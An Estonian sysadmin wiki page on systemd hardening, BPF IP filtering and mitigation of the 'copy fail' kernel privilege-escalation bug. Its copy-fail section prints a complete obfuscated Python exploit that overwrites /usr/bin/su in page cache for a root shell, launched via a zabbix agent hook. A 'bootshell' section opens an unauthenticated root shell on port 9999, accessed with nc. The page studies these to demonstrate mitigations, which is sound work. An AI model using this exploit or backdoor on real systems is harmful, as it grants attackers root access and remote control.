✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

ebpf on seotud mitte protsessiga, aga cgroup'iga nt nginx cgroup juurde kuuluvate ebpf'ide nimekirja esitamine

<pre>
root@systemd-02:~# bpftool cgroup show /sys/fs/cgroup/system.slice/nginx.service
ID AttachType AttachFlags Name
74 cgroup_inet_ingress multi sd_fw_ingress
73 cgroup_inet_egress multi sd_fw_egress
</pre>

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega, mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (asuvad arvuti mälus)

|
v

vfs (virtual file system) (asub arvuti mälus)

|
v

page cache (asub arvuti mälus)

|
v

ext4 filesystem (asub plokkseadmel)

|
v

plokkseade (asub nö füüsilisel esemel)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

Leevenduste iseloomustus

* systemd (seccomp) - operatsioonisüsteemi syscall liidesel asuv nö tulemüür, mingis mõttes asub kerneli protsesside poole vaatavas osas
* apparmor (lsm - linux security modules)- erinevate süsteemi võimekustele ligipääsemise takistamised (asub kerneli protsesside poole vaatavast osast teisel pool)
* modprobe - kerneli funktsionaalsust realiseeriv komponent (kahe esimese puhul ei saa funktsionaalust kasutada isegi kui kernelis on see iseenest kohal)

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

Tulemus paistab selline

<pre>
root@moraal:~# uname -a
Linux moraal 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux

root@moraal:~# modprobe algif_aead
modprobe: ERROR: ../libkmod/libkmod-module.c:1084 command_do() Error running install command '/bin/false' for module algif_aead: retcode 1
modprobe: ERROR: could not insert 'algif_aead': Invalid argument
</pre>

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===20260508 - dirty frag eksploit===

TODO

chatgpt üks pakkumine

<pre>
[Service]
# Blocks the RxRPC network protocol specifically
RestrictAddressFamilies=~AF_RXRPC

# Prevents gaining root via setuid binaries (essential for LPE defense)
NoNewPrivileges=yes

# Blocks the kernel module from being auto-loaded
ProtectKernelModules=yes

# Restricts namespaces (blocks the ESP variant requirement)
RestrictNamespaces=yes
</pre>

Random linux arvutis toetatud protokollide perekonnad (2026 aastal on neid kokku ca 40 tükki)

<pre>
root@pve-wrx90e:~# cat /proc/net/protocols
protocol size sockets memory press maxhdr slab module cl co di ac io in de sh ss gs se re bi br ha uh gp em
SCO 896 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
L2CAP 880 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
HCI 936 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
PACKET 1600 0 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
MPTCPv6 2128 1 949 no 0 yes kernel y y y n y y y y y y y y n n y y y n
PINGv6 1408 0 -1 NI 0 yes kernel y y y n n y n n y y y y y y n y y n
RAWv6 1408 0 -1 NI 0 yes kernel y y y n y y y n y y y y y y y y n n
UDPLITEv6 1472 0 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
UDPv6 1472 2 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
TCPv6 2560 9 949 no 320 yes kernel y y y y y y y y y y y y n y y y y y
XDP 1024 0 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
UNIX-STREAM 1152 628 -1 NI 0 yes kernel y n n n n n n n n n n n n n n n n n
UNIX 1152 65 -1 NI 0 yes kernel y n n n n n n n n n n n n n n n n n
UDP-Lite 1344 0 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
MPTCP 2000 0 949 no 0 yes kernel y y y n y y y y y y y y n n y y y n
PING 1056 0 -1 NI 0 yes kernel y y y n n y n n y y y y y y n y y n
RAW 1216 0 -1 NI 0 yes kernel y y y n y y y n y y y y y y y y n n
UDP 1344 3 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
TCP 2432 23 949 no 320 yes kernel y y y y y y y y y y y y n y y y y y
MCTP 872 0 -1 NI 0 no kernel y n n n n y n n n n n n n n y y n n
NETLINK 1120 77 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
</pre>

Kasulikud lisamaterjalid

* https://github.com/V4bel/dirtyfrag

===bootshell===

Osutub, et systemd pid=1 protsess on selles mõttes unikaalne, et on võimalik käimasolevale protsessile seadistada juurde porte, millel ta teenindab. Näide avab üle võrgu shell kasutamise võimalus, arusaadavalt on see äärmiselt ebaturvaline praktiliselt kasutamiseks

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/bootshell.socket
[Unit]
Description=Neutral Side-Channel Boot Shell Socket

[Socket]
ListenStream=9999
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/bootshell@.service
[Unit]
Description=Neutral Side-Channel Boot Shell Service

[Service]
ExecStart=-/bin/bash -i
StandardInput=socket
StandardOutput=socket
StandardError=socket
</pre>

Tulemusena

<pre>
root@zabbix-pub-01:~# netstat -lnpt | grep 9999
tcp6 0 0 :::9999 :::* LISTEN 1/init
</pre>

Kasutamiseks tuleb üle võrgu tekitada tcp ühendus, nt netcat programmiga

<pre>
imreoolberg@Imres-MacBook-Air ~ % nc 192.168.10.193 9999
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@zabbix-pub-01:/# hostname -f
hostname -f
zabbix-pub-01
root@zabbix-pub-01:/# exit
exit
exit
imreoolberg@Imres-MacBook-Air ~ %
</pre>

===systemd-coredump===

TODO

Kasulikud lisamaterjalid

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-systemd-coredump-for-crash-analysis-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Oxidized kasutamine

2026-06-18T09:19:50Z

Imre: /* Kasulikud lisamaterjalid */

===Sissejuhatus===

TODO

Oxidized tarkvara https://github.com/ytti/oxidized ...

===Tööpõhimõte===

Väited

* Tekitatakse pisike võrguseadme mock linux kasutaja abil
* Tekitatakse docker põhine oxidized

Võrguskeem

<pre>
seade-01 seade-02 seade-03 seade-nn
| | | |

internet - vpn

| |
___|___ ___|___
| | oxidized | | gitea
| | | |
|_______| lokaalne git repo |_______| remote git repo
| |
| |
--|--------------------------------------------------|---

</pre>

kus

* oxidized kopeerib seadmetest seadistused enda lokaalsesse git reposse
* oxidized seadistuses kirjeldatud nn hook sünkroniseerib-kopeerib lokaalsest gitist andmeid remote git peale
* oxidized ja gitea omavad mõlemad webgui liidest
* oxidized ja gitea on mõlemad docker konteinerid
